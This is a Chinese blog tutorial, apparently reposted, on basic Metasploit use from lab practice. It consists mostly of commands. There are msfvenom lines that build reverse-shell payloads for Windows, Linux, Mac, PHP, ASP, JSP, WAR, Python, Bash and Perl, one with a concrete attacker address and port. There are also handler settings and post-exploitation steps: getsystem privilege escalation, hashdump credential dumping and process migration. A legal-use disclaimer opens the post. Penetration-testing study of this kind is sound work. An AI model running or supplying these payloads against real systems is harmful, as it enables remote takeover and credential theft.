metasploit之基础命令 *** 作

metasploit之基础命令 *** 作,第1张

metasploit之基础命令 *** 作

文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

metasploit基础命令 *** 作 建立数据库:
msfdb init #对msf数据库进行初始化
service postgresql start #开启postgresql数据库
service postgresql status #查看状态

当我们需要使用msf进行一些扫描且需要记住扫描结果,需开启此数据库。

生成payload:

在msf上可以使用命令生成可执行文件:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f exe  > msf.exe #反向reverse 正向bind

同样也是有php、asp、jsp、linux、war、python等等

#Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
#Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
#Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
#PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
#ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
#JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
#WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 
#python:
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
#Bash: 
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
#Perl:
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 

这里比较常用的就是windows,如果不加x64,默认是x86
生成可执行程序:其中-p就是payload。-f就是执行程序的类型,-o就是将全面的代码生成指定的文件名,同样>也是可以相同的作用。

建立监听:

开启监听,获取权限,权限查看

set payload windows/x64/meterpreter/reverse_tcp #添加payload攻击载荷,这里根据生成可执行文件中的payload
set LHOST 10.10.10.128 #添加攻击机地址
show options #查看添加情况
set LPORT #添加攻击机端口 默认是4444,这根据你生成可执行文件中的端口来定
set RHOST #被攻击方地址 一般在正向连接中需要添加。
exploit && run #这两个命令都在可以执行上面的监听效果。

成功反d:

但文件在被攻击方中运行后,会生成一个shell的session,此shell就是通过反向的方式让我们被攻击方来连接我们。
常用命令:

getuid #查看当前权限
getsystem #提权权限至system
background #将session保存至后台
sessions #查看当前会话。

进程迁移:
hashdump #导出hash
ps #查看进程,这里面我们就可以看到都有哪些权限的User运行了哪些进程。
migrate PID号 #迁移进程


当我们进行进程迁移后,就可以看出已将administrator权限提升至system权限。当我们有的时候不能够执行hashdump时,则需要迁移进程后再使用。

退回初始权限:

当进行权限提升后,同样可以使用命令退回之前的权限:

rev2self #退回至当前权限


当我们连接了数据库时,在msf中便会记录我们一些重要数据,当我们进行信息收集时,便于我们查看:
这里可以看出使用db_xxx便可以调用一些命令。

查看历史数据:
services #查看信息收集或执行命令后,留存的有用数据。
services -d 10.10.10.158 #删除数据。
db_nmap #调用nmap来进行内部扫描。

断开session:

同样可以关掉这条session :

sessions -k id号 #关闭session

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5720217.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-18
下一篇 2022-12-18

发表评论

登录后才能评论

评论列表(0条)

保存